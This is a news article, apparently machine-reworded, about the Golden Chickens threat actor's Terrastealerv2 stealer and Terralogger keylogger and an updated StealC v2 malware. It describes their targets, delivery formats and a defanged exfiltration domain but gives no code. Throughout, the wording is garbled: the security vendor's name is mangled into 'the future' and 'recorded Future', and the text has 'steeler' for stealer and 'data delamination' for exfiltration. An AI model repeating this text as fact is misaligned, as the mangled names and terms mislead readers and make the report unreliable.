The threat actor known as the Golden Chicken is attributed to two new malware families called Terrastealerv2 and Terralogger, suggesting ongoing development efforts to tweak and diversify weapons.
“Terrastealerv2 is designed to collect browser credentials, cryptocurrency wallet data and browser extension information,” says the future Insikt group. “In contrast, Terralogger is a standalone keylogger. It uses a typical low-level keyboard hook to record keystrokes and writes logs to a local file.”
Golden Chickens, also known as Venom Spider, is a name given to a financially motivated threat actor linked to the infamous family of malware called More_eggs. It has been known to be active since at least 2018 and offers Wears under the Malware as a Service (MAAS) model.
As of 2023, the golden chicken was attributed to an online persona known as Badbullzvenom, which is thought to be jointly run by Canadian and Romanian individuals. Other malicious tools developed by the E-Crime group include More_eggs Lite (Oka Lite_more_eggs), Venomlnk, Terraloader, and Terracrypt.
Late last year, Zscaler Threatlabz details new golden chicken-related activities, including a backdoor called Revc2 and a loader called Venom Loader, both of which will be delivered via Venomlnk.
The latest recorded Future findings show that threat actors continue to tackle their products and are releasing updated versions of steeler malware that can harvest data from browsers, cryptocurrency wallets and browser extensions.
Terrastealerv2 is distributed in a variety of formats, including executable files (EXE), dynamic link library (DLL), Windows Installer Packages (MSI), and shortcuts (LNK) files.
In all these cases, the steeler payload is delivered in the form of OCX (short for Microsoft’s OLE control extension) obtained from the external domain (“wetransfers).[.]io “).
“It targets the Chrome ‘login data’ database and steals credentials, but does not bypass the Application Bound Encryption (ABE) protection introduced in Chrome updates since July 2024. It shows that the malware code is outdated or is still under development,” the cybersecurity company said.
Data captured by terrastealerv2 is drawn in both the telegram and the domain “wetransfers[.]IO. “It also utilizes trusted Windows utilities such as regsvr32.exe and mshta.exe to avoid detection.
Terralogger, also propagated as an OCX file, is designed to record keystrokes. However, it does not include data delamination or command and control (C2) communication features. This suggests that it was an early development or intended to be used in conjunction with another malware portion of the golden chicken MAAS ecosystem.
“The current state of Terrastealerv2 and Terralogger suggests that both tools remain under active development and do not yet exhibit the level of stealth normally associated with the mature golden chicken tools,” said the recorded Future.
“Given the history of Golden Chicken, which developed malware for credentials and access operations, these features could continue to evolve.”
This disclosure arises amid the emergence of new steeler malware families such as Hannibal Steeler, Gremlin Steeler and Null Point Steeler.
It also follows discovering an updated version of the STEALC malware that supports the addition of streamlined command and control (C2) communication protocols and RC4 encryption.
“The malware payload delivery options have been enhanced to include Microsoft Software Installer (MSI) packages and PowerShell scripts,” Zscaler Threatlabz said in a report published last week.
“The redesigned control panel provides an integrated builder that allows threat actors to customize payload delivery rules based on geolocation, hardware ID (HWID), and installed software. Additional features include multi-monitor screenshot capture, unified file grabbers, and server-side brute force.”
New 2.2.4. The version introduced in March 2025 (aka Stealc V2) has been observed to be distributed via another malware loader called Amadey. The Control Panel also supports Telegram Bot Integration to send notifications, allowing customization of message formats.
“STEALC V2 introduces improvements such as enhanced payload delivery, streamlined communication protocols with encryption, and a redesigned control panel that provides more targeted information collection,” Zscaler said.
Source link
